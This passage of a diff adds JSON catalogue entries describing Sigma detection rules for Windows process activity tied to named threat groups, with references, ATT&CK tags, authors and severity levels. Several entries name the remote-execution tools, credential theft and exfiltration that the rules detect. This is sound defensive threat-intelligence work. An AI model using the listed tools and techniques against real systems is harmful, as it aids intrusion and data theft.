activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + 
"attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script", + "meta": { + "refs": [ + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ], + "creation_date": "2017/04/07", + "filename": "proc_creation_win_apt_cloudhopper.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin", + "meta": { + "refs": [ + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ], + "creation_date": "2018/04/08", + "filename": "proc_creation_win_apt_dragonfly.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor", + "meta": { + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2018/01/31", + "filename": "proc_creation_win_apt_elise.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", + "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "value": "Emissary Panda Malware SLLauncher", + "meta": { + "refs": [ + "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://twitter.com/cyb3rops/status/1168863899531132929", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2018/09/03", + "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects EmpireMonkey APT reported Activity", + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey", + "meta": { + "refs": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" + ], 
+ "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/04/02", + "filename": "proc_creation_win_apt_empiremonkey.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Very Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": "Equation Group DLL_U Load", + "meta": { + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/07/10", + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + 
], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "18739897-21b1-41da-8ee4-5b786915a676", + "value": "GALLIUM Artefacts", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "proc_creation_win_apt_gallium.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution", + "meta": { + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ], + "creation_date": "2022/03/04", + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/05/20", + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity observed by different 
researchers to be HAFNIUM group activity (or related) on Exchange servers", + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity", + "meta": { + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ], + "creation_date": "2021/03/09", + "filename": "proc_creation_win_apt_hafnium.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Hurricane Panda Activity", + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + 
"value": "Judgement Panda Exfil Activity", + "meta": { + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ], + "creation_date": "2019/02/21", + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications", + "meta": { + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/06/18", + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "author": "Markus Neis, Swisscom", + "level": "critical", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21", + "meta": { + "refs": [ + 
"https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/04/20", + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Should not be any false positives" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20", + "meta": { + "refs": [ + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/12/23", + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders", + "meta": { + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/12/23", + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "author": "Florian Roth, wagga", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker", + "meta": { + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/06/03", + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", + "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "value": "MERCURY Command Line Patterns", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.g0069" + ], + "creation_date": "2022/08/26", + "filename": 
"proc_creation_win_apt_mercury.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detecting DNS tunnel activity for Muddywater actor", + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2020/06/04", + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", + "author": "@caliskanfurkan_", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper", + "meta": { + "refs": [ + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_apt_mustangpanda.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } 
+ }, + { + "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns", + "meta": { + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ], + "creation_date": "2021/07/03", + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Silence downloader. 
These commands are hardcoded into the binary.", + "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", + "value": "Silence.Downloader V3", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.discovery", + "attack.t1057", + "attack.t1082", + "attack.t1016", + "attack.t1033", + "attack.g0091" + ], + "creation_date": "2019/11/01", + "filename": "proc_creation_win_apt_silence_downloader_v3.yml", + "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "value": "Defrag Deactivation", + "meta": { + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005", + "attack.s0111" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_slingshot.yml", + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Trojan loader activity as used by APT28", + "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "value": "Sofacy Trojan Loader Activity", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + 
"https://twitter.com/ClearskySec/status/960924755355369472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "car.2013-10-002", + "attack.t1218.011" + ], + "creation_date": "2018/03/01", + "filename": "proc_creation_win_apt_sofacy.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/15", + "filename": "proc_creation_win_apt_sourgrum.yml", + "author": "MSTIC, FPT.EagleEye", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool", 
+ "meta": { + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" + ], + "creation_date": "2017/10/22", + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Renamed SysInternals tool" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern", + "meta": { + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0092", + "attack.t1106" + ], + "creation_date": "2020/12/08", + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ], + "creation_date": "2020/07/30", + "filename": "proc_creation_win_apt_taidoor.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018", + "meta": { + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/12", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects automated lateral movement by Turla group", + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement", + "meta": { + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "creation_date": "2017/11/07", + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects automated lateral movement by Turla group", + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral 
Movement", + "meta": { + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "creation_date": "2017/11/07", + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "author": "Markus Neis", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020", + "meta": { + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ], + "creation_date": "2020/05/26", + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "value": "UNC2452 Process Creation Patterns", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + 
